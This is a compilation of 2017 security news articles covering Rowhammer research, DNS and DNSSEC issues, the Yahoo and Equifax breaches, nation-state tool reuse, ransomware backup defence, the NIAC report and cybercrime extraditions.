STE WILLIAMS

RAM, bam, awww … man! Boffins defeat Rowhammer protections

Ever since Rowhammer first emerged, there’s been something of an arms race between researchers and defenders, and the boffins firing the latest shot reckon they’ve beaten all available protections.

In the two years since Google first showed how forced bit-flipping could cause memory errors and create a takeover vector, boffins have worked on hardware and software mitigations on one side, and new attacks on the other.

An Austrian-American-Australian collaboration now offers up the worst of bad news: all the current defences can be defeated – and their attack can work remotely, including against cloud-based systems.

In this paper, the eight collaborators * present an attack they call “one-location hammering”.

This offers a new way to trigger the bug, they write: “we do not hammer multiple DRAM rows but only keep one DRAM row constantly open. Our new exploitation technique, opcode flipping, bypasses recent isolation mechanisms by flipping bits in a predictable and targeted way in userspace binaries”.

To make sure their attack is predictable, the boffins “replace conspicuous and memory-exhausting spraying and grooming techniques” with what they call “memory waylaying”. This tricks the operating system into putting target pages at physical memory locations controlled by the attacker.

Time to start again

The researchers say current Rowhammer mitigations fail in the face of their attack.

It’s easy to defeat static analysis, they write, by running code within Intel SGX enclaves; this also defeats mitigations based on performance counters.

Single-location hammering gets around a third mitigation, software that analyses memory access patterns; and defences based on physical memory isolation are the target of their “opcode flipping”.

“Opcode flipping exploits the fact that bit flips in opcodes can yield different, yet valid opcodes”, the paper says. They demonstrate the technique against the sudo command, “allowing exploitation of any of the 29 offsets in the sudo binary to gain root privileges”.

To get around protections that work by analysing the memory footprint of a Rowhammer attack, the researchers’ “memory waylaying”. This “performs replacement-aware page cache eviction, using only page cache pages. These pages are not visible in the system memory utilization as they can be evicted any time and hence, are considered as available memory. Consequently, memory waylaying never causes the system to run out of memory.”

As already mentioned, the researchers claimed their attack could work against cloud-based systems. Since taking out a machine on AWS or Azure clouds would bring down the wrath of giants, they tested the attack on configurations designed to simulate cloud servers (Haswell- and Skylake-based servers). ®

* Graz University of Technology’s Daniel Gruss, Moritz Lipp, Michael Schwarz, Jonas Juffinger and Wolfgang Schoechl; Daniel Genkin of the University of Maryland and University of Pennsylvania; and Sioli O’Connell and Yuval Yarom of the University of Adelaide, the last also of CSIRO’s Data61)

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/05/rohwammer_defences_defeated_by_opcode_flipping/

DNS a ‘Victim of its Own Success’

Why securing the Domain Name System remains an afterthought at many organizations.

It’s been nearly one year since the massive DDoS attack on Domain Name Service (DNS) provider Dyn that disrupted major websites including Amazon, CNN, Netflix, Okta, Pinterest, Reddit, and Twitter, but DNS security remains an enigma for many businesses.

According to a new study conducted by Dimensional Research on behalf of Infoblox, some three out of 10 companies have been hit with cyberattacks on their DNS infrastructure, 93% of whom suffered downtime – 40% of them for an hour or more. But that likely just scratches the surface of the volume of attacks on DNS, experts say, because many DNS attacks are tough to detect.

“That number [of attacks] seems a little low,” says DNS pioneer Paul Vixie, CEO and founder of DNS security firm FarSight Security, of the new data. Vixie, who is the principal author of the pervasive BIND DNS server software and creator of several DNS standards, notes that it’s difficult for some organizations to pinpoint an attack came via their DNS.

Downtime costs, too, are likely higher than the Dimensional/Infoblox study data shows. Some 54% of organizations in the study say they lost $50,000+ to a DNS attack, while nearly a quarter lost $100,000+. “There are things you can count, but you don’t know about every attack that happens or every actual cost because it isn’t always” quantifiable, so the losses could be more, Vixie notes.

Prakash Nagpal, vice president at network and DNS security firm Infoblox, concedes that there likely are more DNS attacks that just aren’t discovered. “I do think more companies have been” hit than that, he says of the data. The most well-known DNS threats are distributed denial-of-service attacks, of course, he says. But “DNS is not just about DDoS attacks,” Nagpal says.

“In a lot of cases they [victims] don’t know they were subjected to DNS attacks because they [the attacks] are so subtle … I don’t think people make the connection between DNS and malware” distribution and data exfiltration, he says.

An infected machine has to “call home” at some point, he says, and one of the most common types of DNS attacks is where attackers use the DNS to siphon data from the victim organization. The infected machine is forced to make DNS requests to the attacker’s server, which in turn pulls the stolen data from that machine during those interactions. So if an executive’s laptop is infected, the attackers can pull sensitive data such as financial reports, for example, via those DNS queries, he says.

“While DDoS remains a big source of downtime and a huge source of attack, where DNS is being used in data exfiltration” should also be of concern, according to Nagpal.

The Infoblox study, which queried more than 1,000 security and IT professionals worldwide, illustrated how reactive DNS security tends to be in organizations: three quarters of organizations who haven’t experienced a DNS attack say antivirus monitoring is their main focus security-wise, but 70% of those who’ve been hit by a DNS attack rank DNS security as their number one security priority.

“DNS is a victim of its own success. How many times do you think about how your phone call gets routed? You’re not supposed to; the same in the IP space,” Nagpal says. There also can be a learning curve for DNS and its security implications, he says.

“DNS [security] is still not top of mind,” Nagpal says.

The Oct. 21 wave of DDoS attacks on Dyn – courtesy of the historic Mirai botnet of infected Internet of Things devices – used masked TCP and UDP traffic via Port 53 to overwhelm the DNS provider’s infrastructure as well as recursive DNS retry traffic. It was the DNS traffic sent in the DDoS that was most perplexing when it came to detecting it.

Scott Hilton, executive vice president of product for Dyn, explained in the aftermath that the DNS traffic sent in the DDoS attacks also generated legitimate DDoS retry traffic, making the attack more complicated to parse, and the attack generated ten to 20 times the normal DNS traffic levels thanks to malicious and legitimate retries.

“During a DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic,” he said in a blog post. “When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume. We saw both attack and legitimate traffic coming from millions of IPs across all geographies.”

More DNS Security Woes

Meanwhile, Google researchers this week disclosed they had found seven security flaws in DNS software used in Android, home routers, and IoT devices. The flaws in Dnsmasq since have been fixed, but the chance of most IoT devices getting them is slim since those devices traditionally don’t get software updates. Vixie says the bugs have to do with the software, not DNS itself. “It’s a cute little piece of software, tiny, and not sloppy code. But it had bugs” like most other software and these devices run it, he says.

Android devices are less at risk given built-in security features, but millions of IoT devices could be exploited, experts say. Craig Young, computer security researcher for Tripwire’s Vulnerability and Exposures Research Team, says the RCE flaw (CVE-2017-14491) specifically can be abused via malicious DNS replies, but would be difficult to exploit to build a Mirai-type botnet without the attacker jumping through various hoops. Among those: he or she would have to force the vulnerable device to issue a DNS request that the attacker would reply to, for example. Even so, he says “the possibility of widespread attack cannot be entirely ruled out.” 

It’s another example of just how IoT devices can easily be abused. “The cheaper the device, you more you can fear it,” Vixie says. “I expect more Mirais” to emerge, he adds, because locking down IoT devices is a major cost that doesn’t jive economically with low-cost consumer devices.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/perimeter/dns-a-victim-of-its-own-success--/d/d-id/1330048?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Yahoo, Equifax Serve as Cautionary Tales in Discerning Data Breach Scope

Both companies this week revealed that their previously disclosed breaches impacted a lot more people than previously thought.

Yahoo and Equifax’s separate disclosures this week that previously reported data breaches at their organizations were even bigger than first thought illuminated the massive challenge enterprises face in gauging the true scope of malicious intrusions these days.

Yahoo’s parent company Verizon on Tuesday said an August 2013 breach that Yahoo disclosed in Dec. 2016 impacted a mind-boggling three billion email accounts rather than the one billion figure originally reported. 

Following Verizon’s acquisition of Yahoo and during the integration of the two companies, Yahoo obtained new information showing that every single one of its user accounts in August 2013 was compromised, Verizon subsidiary Oath said in a statement. The investigation showed that the data that was stolen did not include, however, clear text passwords, payment card data, or bank account information, the company said.

In a similar update the day before, Equifax said that the actual number of people impacted by the breach it disclosed on Sept. 7 was 145.5 million, or 2.5 million more than the number it had first reported. The company said a forensic analysis conducted by cybersecurity firm Mandiant unearthed the additional victims. The investigation showed that no databases outside the US were impacted, Equifax said, while also revising downward the number of Canadian victims impacted from 100,000 to 8,000.

Nathan Wenzler, chief security strategist at security consulting firm AsTech, says multiple factors can make it hard for organizations to get a true handle on the scope of intrusions such as the ones at Yahoo and Equifax. “Most of it centers on the lack of sound asset management and inventory processes,” he says.

Many organizations don’t actually know what they have to begin with, and therefore struggle to figure out what was breached when an incident occurs. “And, to be fair, a lot of hackers don’t make it easy to figure out either,” Wenzler says. “Systems can be compromised quietly, with no trace of anything serious being done, which can make it difficult for a researcher to know for certain that a system was compromised.”

Companies with a less than perfect understanding of their assets are likely to keep discovering more datasets that have been compromised than they originally assumed when investigating a breach incident, he says.

CEO in the Hotseat

Equifax’s update this week added to broad concerns over its response to the breach overall, including its 45-day delay in breach notification and its inavertently pointing those wanting to sign up for free credit monitoring to a phishing website.

Former Equifax CEO Richard Smith, who retired from the company after the breach, this week acknowledged mistakes with the rollout of the signup website and call centers. In many cases, such issues added to the frustration of American consumers, he said in prepared testimony for a US House Committee on Energy and Commerce subcommittee, which held a hearing on the breach this week.

The testimony delved into some details of the incident. Smith noted that when Equifax’s security organization first heard from US-CERT about an Apache Struts vulnerability that needed to be patched, the information was promptly relayed to all applicable personnel. However, the vulnerability remained unpatched and was not caught in subsequent scans, giving the intruders a way into Equifax’s network.

In some cases, organizations that suffer large, sophisticated breaches will never know the full scope of its impact, says Michael Sutton, CISO at Zscaler. With Yahoo, there’s no information on what new evidence led it to the two billion additional breached accounts one year after the original discovery. That the initial investigation failed to catch such a huge number of compromised accounts is significant, he says.

“While it’s possible that new evidence, such as logs were uncovered that hadn’t previously been reviewed, more likely a new connection was made,” he says. “Breach investigations are all about connecting the dots — identifying an entry point and figuring out where the attacker went from there,” he says. “Without transparency from Yahoo, we can only speculate as to what new dots were connected.”

Generally, determining the full scope of an incident can be hard when multiple entry points are involved and when multiple devices or accounts are compromised, Sutton notes.

Investigators had a hard time figuring out what was stolen from Equifax because the records were stored in various data tables across multiple systems, according to the CEO’s testimony. So tracing the records back to specific individuals, given the massive scope of the compromise, was very time consuming and difficult, he said.

The telltale signs of such attacks can be scattered and hard to find even if they exist. “Following the trail of breadcrumbs to trace the attacker’s path requires that the bread crumbs exist in the first place,” Sutton says. “It’s possible that logs have blind spots or have been overwritten, especially when a breach investigation takes places months or years after the incident.”

Backup logs are one place where a breached entity might discover more records than were originally presumed compromised in an incident, says Alex Held, chief research officer at SecurityScorecard.

Attackers can put in a lot of effort to erase evidence of unauthorized access following a successful attack. Log removal is often the final step in this effort because it can blur the true scope of the incident and make attribution difficult. In such situations, a backup logs that may not have been available during the initial investigation can shed fresh light on the true scope of the incident, he says.

Related Content:

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/yahoo-equifax-serve-as-cautionary-tales-in-discerning-data-breach-scope-/d/d-id/1330051?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Nation-State Attackers Steal, Copy Each Other’s Tools

When advanced actors steal and re-use tools and infrastructure from other attack groups, it makes it harder to attribute cybercrime.

New research indicates cybercriminals are making attacker attribution increasingly complex by re-using tools and tactics from other hacker groups.

Researchers on the Kaspersky Lab Global Research and Analysis Team (GReAT) found evidence that sophisticated threat actors are hacking other attack groups to steal victim data, borrow tools and techniques, repurpose exploits, and compromise the same infrastructure.

The result is a major attribution challenge. Reliable threat intelligence is based on identifying patterns and tools associated with a specific threat actor. These signs help security researchers map the targets and behaviors of different attackers. When hackers start hacking one another, using the same tools, and targeting the same victims, the model breaks down.

Kaspersky believes these types of attacks are most likely to be used among nation-state backed groups targeting foreign or less competent actors. IT security researchers should know how to detect and interpret these attacks so they can present their intelligence in context.

The idea behind this research was to better understand the practice of fourth-party collection through signal intelligence (SIGINT), which involves the interception of a foreign intelligence service’s computer network exploitation (CNE) activity. Researchers observed attackers’ actions and in doing so, found evidence showing they actively steal from one another.

“In less technical terms, fourth-party collection is the practice of spying on a spy spying on someone else,” explain GReAT researchers Juan Andrés Guerrero-Saade and Costin Raiu in a post on Kaspersky’s SecureList blog.

There are two main approaches to these attacks: passive and active. Passive involves intercepting other groups’ data while it’s in transit between victims and command-and-control (CC) servers. It’s almost impossible to detect. Active collection, however, leaves footprints.

Active attacks involve breaking into another threat actor’s malicious infrastructure. It’s dangerous for attackers because it heightens the risk of detection, but it’s also beneficial. The success of active collection depends on the target making operational security errors.

During their investigation of specific threat actors, the GReAT team found several pieces of evidence suggesting these active attacks are already happening in the wild. These include:

Backdoors installed in another actors’ CC infrastructure

Researchers found two examples of backdoors in hacked networks, which let attackers persistently infiltrate another group’s operations. One of these instances was discovered in 2013 during an investigation of the NetTraveler attacks. Researchers obtained a server and, during their analysis, discovered a backdoor seemingly placed by another actor. It’s believed the goal was to maintain prolonged access to the NetTraveler infrastructure or the stolen data.

Another was found in 2014 while investigating a hacked website used by Crouching Yeti, also known as “Energetic Bear,” an APT actor active since 2010. Researchers noticed the panel managing the CC network was modified with a tag pointing to a remote IP in China, which is believed to be a false flag. They think this was also a backdoor belonging to another group.

Sharing compromised websites

In 2016, Kaspersky found a website hacked by DarkHotel also hosted exploit scripts for another attacker. The second, which was codenamed “ScarCruft,” primarily targeted Russian, Chinese, and South Korean organizations. The actor relied on watering hole and spearphishing attacks.

Targeting attackers’ focus areas

By infiltrating a group with stake in a specific region or industry, attackers can benefit from another group’s work and specifically target certain groups of people. It’s risky for attackers to share victims in the case one group gets caught; if they do, analysis will reveal who the other threat actors were.

In November 2014, Kaspersky researchers located a server in a Middle East research institution hosted implants for advanced actors Regin, Equation Group, Turla, ItaDuke, Animal Farm, and Careto. The discovery of this server marked the beginning of the eventual discovery of the Equation Group.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/nation-state-attackers-steal-copy-each-others-tools/d/d-id/1330052?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

DNSSEC master key change delayed after ISPs struggle

Something has gone awry with Internet governing body ICANN’s timetable for changing the cryptographic root key used by DNSSEC (Domain Name System Security Extensions), a technology first deployed in 2010 to protect the global DNS system from cache poisoning attacks.

Scheduled to happen on 11 October, this important event has now been postponed until the first quarter of 2018 after ICANN discovered a number of ISPs were having trouble with the automated key update process.

Posted in July, ISPs using DNSSEC were supposed to have installed the new Root Zone Key Signing Key (KSK) that lies at the heart of the system within 90 days.

ICANN’s research suggested around 5-8% of ISPs hadn’t.

It’s the first time the key has ever been changed in DNSSEC’s short history, so perhaps problems were to be expected. Explained ICANN:

There may be multiple reasons why operators do not have the new key installed in their systems: some may not have their resolver software properly configured and a recently discovered issue in one widely used resolver program appears to not be automatically updating the key as it should, for reasons that are still being explored.

In other words, ISPs may have thought they’d implemented it but hadn’t because of an undetected technical glitch. Had ICANN not halted final deployment, domains managed by these providers would suddenly have become unreachable next week.

But is DNSSEC that important?

The technology’s origins go back to 2008 when a researcher called Dan Kaminsky discovered a problem with the DNS protocol used by websites to resolve human-readable domains into computer-friendly IP addresses.

The gist was that an attacker could redirect users looking for a real domain to a spoofed one by compromising the domain record held in a DNS cache. Users would be sent to the fake site for as long as the spoofed record remained in the cache.

The answer experts came up with was to verify every level of the DNS hierarchy cryptographically – a chain of trust – but that meant there had to be an ultimate authority: a key sitting on root servers at the apex of the system. This is the Root Zone KSK.

The changing of the KSK began with an almost religious ceremony in a windowless room in California last year but there is in fact no fundamental reason why it has to be completed this month.

When DNSSEC started, ICANN committed to changing the KSK every five years, a timetable that has already slipped. Nevertheless, everyone knows it has to be changed at some point simply to demonstrate “cryptographic hygiene”.

Naked Security understands that ICANN will now monitor uptake in the coming weeks before, as a last resort, publishing a list of providers that have failed to apply the new key correctly.

The bigger picture here is DNSSEC. This is still not adopted by a swathe of Internet providers, wary perhaps of the management complexity of its cryptographic design. It is, however, mandatory for the new generic Top-Level Domains (gTLDs) that started appearing in 2013.

Uptake of DNSSEC will surely increase over time and a smooth transition from the old to the new Root Zone Key Signing Key (KSK) can only help with adoption.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/2ehTO95EsRw/

Russian suspected of $4bn Bitcoin laundering op to be extradited to US

A Greek court has approved the US extradition of a Russian national accused of running a $4bn Bitcoin laundering ring on the now-defunct BTC-e exchange.

Alexander Vinnik, 38, was arrested in Greece in July and is wanted by both the States and Moscow. Authorities suspect he was ringleader and responsible for alleged laundering activity since 2011.

Vinnik has denied the charges against him. Reuters reports that a Greek court today cleared him to be extradited to America, where he could face up to 55 years in prison if convicted.

He is reportedly appealing the decision in Greece’s supreme court.

The risk of money laundering is one reason why some shy away from decentralised virtual cryptocurrencies such as Bitcoin. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/04/russian_accused_of_laundering_4_billion_in_bitcoin_to_be_extradited_to_us/

Ransomware Will Target Backups: 4 Ways to Protect Your Data

Backups are the best way to take control of your defense against ransomware, but they need protecting as well.

Ransomware has had a banner year so far. Two major attacks — WannaCry and NotPetya — have caused, conservatively, hundreds of millions of dollars in damages, while cybercriminals continue to target users’ systems and data.

Proactive companies, however, do have options. The most consistent defense against ransomware continues to be good backups and a well-tested restore process. Companies that consistently back up their data and can quickly detect a ransomware attack should be able to restore their data and operations with a minimum of disruption.

In some cases, we have seen wiper malware such as NotPetya pretending to be Petya ransomware while serving a similar ransom note. In these attacks, the victims won’t be able to get their files back even they pay the ransom — making the ability to restore from a backup even more critical.

For that reason, the cybercriminals — and, in some cases, nation-state agents — behind ransomware have begun targeting the backup processes and tools, as well. Several ransomware programs — such as the recent WannaCry (WannaCrypt0r) and the newer version of CryptoLocker — delete the shadow volume copies created by Microsoft’s Windows operating system. Shadow copies are a simple method that Microsoft Windows provides for easy restoration.

On the Mac, cybercriminals targeted backups from the get-go. Researchers have discovered incomplete functions in the first Mac ransomware — released in 2015 — that targeted the disk used by the Mac OS X operating system’s automated backup tool called Time Machine.

The strategy is straightforward: Encrypt the backup and individuals or companies are likely to lose the ability to restore data and are more likely to pay a ransom. Attackers are escalating their efforts beyond infecting single workstations and aim to destroy the backups, too.

Here are four recommendations to help companies protect their backups against ransomware attacks.

1. Be careful using network file servers and online sharing services.
Network file servers can be easy to use and are always available, two attributes that make network-accessible “home” directories a popular way to centralize data and make it easy to back up. However, when exposed to ransomware, this type of data architecture has serious security weaknesses. Most ransomware programs encrypt connected drives, so the victim’s home directory would be encrypted as well. In addition, any server that runs a vulnerable and highly targeted operating system like Windows could be infected, which would lead to every user’s data being encrypted.

Thus, any company with a network file server needs to assiduously back up the data to a separate system or service, and specifically test the system’s restore capability if faced with ransomware.

Cloud file services aren’t immune to ransomware either. In 2015, Children in Film, a business providing information for child actors and their parents, got hit with ransomware. The company extensively used the cloud for its business, including a common cloud drive. Within 30 minutes of an employee clicking on a malicious e-mail link, more than 4,000 files stored in the cloud were encrypted, according to an article in KrebsOnSecurity. Fortunately, the company’s backup provider was able to restore all of the files, even though it took almost a week to complete the process.

Depending on whether the cloud service provided incremental backups or easily managed file histories, recovering data in the cloud could be more difficult than an on-premises server.

2. Get visibility into your backup process.
The earlier that a company can detect a ransomware infection, the more likely that the business can prevent significant corruption of data. Data from the backup process can provide early warning of a ransomware infection. A program that suddenly encrypts your data leaves signs in your backup log. Incremental backups will suddenly “blow up” as every file is essentially changed, and the encrypted files can’t be compressed or deduplicated.

Monitoring vital metrics such as capacity utilization from the backup process on a regular basis — essentially, every day — can help companies detect when ransomware has infected a system inside the company and limit the damage from the compromise.

3. Consider your solution options.
If ransomware can directly access backup images, then it will be very challenging if not impossible to stop it from encrypting corporate backups. For that reason, a purpose-built backup system that abstracts the backup data will be able to prevent ransomware from encrypting historical data.

By separating backups from your normal operating environment and making sure the process is not running on a general-purpose server and operating system, your backups can be hardened against attack. Backup systems based on the most commonly targeted operating system, Microsoft Windows, are prone to being attacked and make it much harder to protect your backup data.

4. Regularly test your recovery process
Finally, backups are no good unless you can recover both reliably and quickly. Some victims of ransomware have had backups but still have had to pay the ransom because the backup schedule did not perform backups with enough granularity, or they were not backing up the data they thought they were backing up.

Part of testing the recovery process is determining the window of data loss. A company that does a full backup every week will lose up to a week of data should it need to recover after its last backup. Doing daily or hourly backups greatly increases the level of protection. More granular backups and detecting ransomware events as early as possible are both key to fending off damage.

In the end, companies should aim to detect ransomware attacks early through monitoring or anti-malware defenses, use a purpose-built system to maintain a separation between the backup data and a potentially compromised system, and regularly test the backup and restore process to ensure data is properly protected.

These efforts will keep backups at the top of the list of ransomware defenses and will reduce the risk of losing data in the event of an attack.

Related Content:

 

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Rod Mathews serves as Senior VP General Manager, Data Protection Business, for Barracuda. He directs strategic product direction and development for all data protection offerings, including Barracuda’s backup and archiving products, and is also responsible for Barracuda’s … View Full Bio

Article source: https://www.darkreading.com/endpoint/ransomware-will-target-backups-4-ways-to-protect-your-data/a/d-id/1330029?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

What Security Teams Need to Know about the NIAC Report

Which of the recommendations made by the NIAC working group will affect security teams the most, and how should they prepare?

A report from the National Infrastructure Advisory Commission (NIAC) suggests that the United States is in a “pre-9/11 moment.” The authors were addressing the potential of a catastrophic cyber attack against the US that could result in the cyber equivalent of the 9/11 attack.

After the cybersecurity executive order was issued in May, the National Security Council (NSC) tapped the NIAC to determine how federal agencies and capabilities could be applied to improve the cybersecurity of critical infrastructure assets. They focused on assets that, if attacked, could result in “catastrophic regional or national effects on public health or safety, economic security, or national security.” Which of the recommendations will affect security teams, and what should they do to prepare? These developments, arising from three specific recommendations should be tracked closely:

1. Recommendation: Identify the best-in-class scanning tools and assessment practices, and then apply them to the most critical networks.

A security team may do a good job of testing its own networks, but connections with other networks (e.g., vendors and partners) that are necessary for conducting business serve to limit overall operational security. Making broadly available the best assessment tools will benefit not only direct users of your product or service but increase overall nationwide security when done in collective effort with other enterprises. A “Center of Excellence” for scanning and assessment tools will create a testing environment to evaluate software that can be used widely, but, in particular, small and midsize businesses and educational institutions that otherwise might lag behind large organizations.

Action: Security teams should track this development because it is intended to support best practices in a shared environment that will make network testing more effective and less costly.

2. Recommendation: Establish limited-time, outcome-based market incentives to encourage organizations to upgrade cyber infrastructure, invest in state-of-the-art technologies, and meet industry standards or best practices.

Budgetary constraints sometimes lead organizations to make suboptimal decisions about the types of processes and technologies they implement to prevent cyber attacks. The NIAC report recommends implementing tax credits to enable and encourage security system upgrades, which will free up significant financial resources that can be directed toward improving cyber resilience.

It also urges relief from government security audits when industry standards are consistently met. How can anyone tell when industry standards are met? The Commission strongly recommends implementing the National Institute of Standards and Technology (NIST) Cybersecurity Framework in order to qualify for incentives.

Action: Security teams should begin orienting their cybersecurity program around the NIST Cybersecurity Framework, and they should track and support the development of legislation to provide incentives to organizations that can demonstrate a standardized level of cyber maturity.

3. Recommendation: Establish separate, secure communications networks specifically designated for the most critical cyber networks.

While the primary inspiration for this recommendation is the utility industry’s IT and OT networks, the definition of “critical infrastructure” has broadened. It now includes other systems of computing networks without which the country couldn’t operate, including financial systems. As the threats escalate and attacks become more organized, leveraging “dark fiber” networks and other alternatives for key critical communications is highly recommended.  

Action: In addition to tracking the development of dark fiber networks, security teams supporting critical infrastructure should identify the most critical communication processes and evaluate how those can be hardened, including the use of private networks. 

The urgency depicted in the NIAC report and the increasing frequency and impact of large breaches like Equifax is accelerating the government’s concern with the state of the nation’s cybersecurity. We recommend keeping an eye on the steps that will be taken based on the report’s recommendations, as we may be heading toward a cyber Sarbanes-Oxley Act.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Mike Shultz is CEO and founder of Cybernance, a SAFETY Act-designated company that regulated industries, public companies, and government agencies rely on to oversee and manage cyber-risk. Previously, Shultz was CEO of cybersecurity firm Infoglide Software, the application … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/what-security-teams-need-to-know-about-the-niac-report/a/d-id/1329999?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Email fraudsters foiled by a smiley

Annie Giles is a grapegrower in Marlborough, New Zealand, located at the top of the South Island, famous for winemaking and home of world-renowned Sauvignon Blanc. No matter what time of year, as the New Zealand marketers enthuse, there’s always something going on in Marlborough: wine tastings, tours, cycling, loads of wine cellars to explore.

No wonder grapegrower Annie Giles’ emails are always peppered with smiley faces!

…except, that is, when they’re not.

That situation came to pass when hackers took over her email account and, pretending to be Giles, wrote to the vintner that she sells her grapes to, Marlborough Vintners. They were looking for a payment due to Annie for about $90,000. “Annie” said that her bank account had been “put under review.” Hence, the payment needed to be deposited into a different account, the fraudsters explained.

Uh-huh. OK. The thing was, that email from “Annie” sure didn’t look like it was from Annie, mused Kathryn Walker, the general manager at Marlborough Vintners.

There were a number of things wrong with it, as Walker told Stuff New Zealand.

First, the language was formal. It wasn’t typical of Giles’ typical bubbly correspondence. Walker was familiar with the grapegrower’s communiques, so she could tell. Besides that, Annie Giles’ partner, her husband Graeme, hadn’t been cc’ed. Hmmm. Odd.

But the anomaly that really snatched that potential $90,000 payout out of the crooks grubby cyber paws: no smiley face at the end of the email.

No smiley face?!?! Red flag!!!

According to Stuff, it was about a month ago that Annie and Graeme Giles found themselves victimized by international email hackers.

The publication quoted Graeme:

Over the space of five days there were four or five emails… It wasn’t my wife at all.

The Giles lucked out: before she went to work for the vintner, Kathryn Walker says she’d had a 12-year career in commercial banking. Besides being good at spotting emails that give off subtle clues that they’re from imposters who’ve hijacked an account, she’s also aware that whatever type of “review” the account was purportedly under “is not something that would happen.”

She smelled a rat, so Walker contacted the couple before paying the money into the fraudsters’ account. Her guess is that the crooks had intercepted talk of a large sum that the Giles had emailed each other about in the prior month.

Bank staff told Graeme Giles that the account number controlled by the crooks had been subjected to “genuine infiltration” by offshore hackers. As of Tuesday, police were reportedly still investigating the attempted theft.

Graeme Giles called this a “cautionary tale” and suggests business owners routinely update passwords.

Should you regularly update a good, gnarly, tough to guess, unique password? One that’s only used for one account, not copy-pasted all over multiple accounts? Well, if somebody’s managed to get their hands on the password, the answer is obviously yes. It doesn’t matter if it’s a 8-character head-desk-thumper or a 50-character beast stuffed with special characters and correcthorsebatterstaple pass phrasery: breached is breached.

Unfortunately, people often reuse their passwords on multiple sites, and hackers are well aware of it. If the password gets stolen from one site, they’ll try it on other sites to see if they can break into wherever else it’s used.

For me, the lesson learned from this stopped-by-the-smiley story isn’t so much that we should regularly change our passwords. After all, people are already suffering from security fatigue as it is. They’re bombarded by warnings of new threats to the point that they basically give up, and that’s when they start acting recklessly.

Exhausted from all the finger-wagging about not reusing passwords or changing passwords frequently, they go right ahead and reuse passwords or come up with sequential passwords that aren’t really new at all, from a cracking perspective: Here’sMyPassword1, Here’sMyPassword2, and on and on.

So, Naked Security respectfully disagrees with Giles on this, as do US standards body NIST and the UK’s National Cyber Security Centre, amongst others.

Perhaps a better lesson to learn is to use two-factor authentication (2FA) whenever it’s available. Granted, it’s not foolproof: there are good reasons why the US National Institute for Standards and Technology (NIST) recently published new guideliness forbidding SMS-based authentication. It can be hacked.

But codes generated by an authenticator app are a pretty decent defense against people taking over your accounts. Using them means that the crooks have to steal your phone and figure out your lock code in order to access the app that generates your unique sequence of logon codes.

But even those aren’t a cure-all. As Naked Security’s Paul Ducklin says:

Malware on your phone may be able to coerce the authenticator app into generating the next token without you realising it – and canny scammers may even phone you up and try to trick you into reading out your next logon code, often pretending they’re doing some sort of “fraud check”.

If in doubt, don’t give it out!

Don’t give it out, don’t pass up 2FA (it’s not invincible, but it’s good!), and pray for a savvy ex-banking pro like Kathryn Walker to be your guardian angel.

Speaking of which, while we’re at it, brush up on the type of insight that Ms. Walker has in spades. A lack of errors doesn’t mean an email is genuine but the presence of errors might, so familiarize yourself with what to watch out for to spot fraudulent emails, be it spelling errors, tone, or the gaping hole where a smiley face usually sits.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/QIRVzb5Tyro/

Russian bot-herder and election-fiddling suspect closer to US trial

The 36-year-old Russian accused of herding pump-and-dump spambots will be tried in America, following a decision of a Spanish court.

Peter Yuryevich Levashov was arrested in Spain in April 2017 and accused of running the Kelihos botnet. While early speculation floated the idea he was involved in election fiddling, his first appearance in court made it clear US authorities believed his operation was, among other things, spamming targets to try and get them to buy – and inflate the price of – worthless stock.

The Department of Justice’s list in April said he would be accused of “harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software”.

Reuters now reports Spain’s High Court has okayed Levashov’s extradition.

Levashov has a slender three days to lodge an appeal against the extradition.

In opposing the extradition, Levashov claimed he’d worked for Vladimir Putin’s United Russian Party for 10 years, and he feared torture if sent to America.

He was quoted in Russian outlet RIA as saying “If I go to the U.S., I will die in a year. They want to get information of a military nature and about the United Russia party … I will be tortured, within a year I will be killed, or I will kill myself”.

The High Court ruling dismissed that, saying neither Levashov’s allegations of political motivations nor threats to his well-being had been proven.

Russia also wants to extradite Levashov. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/04/russian_botherder_a_step_closer_to_us_trial/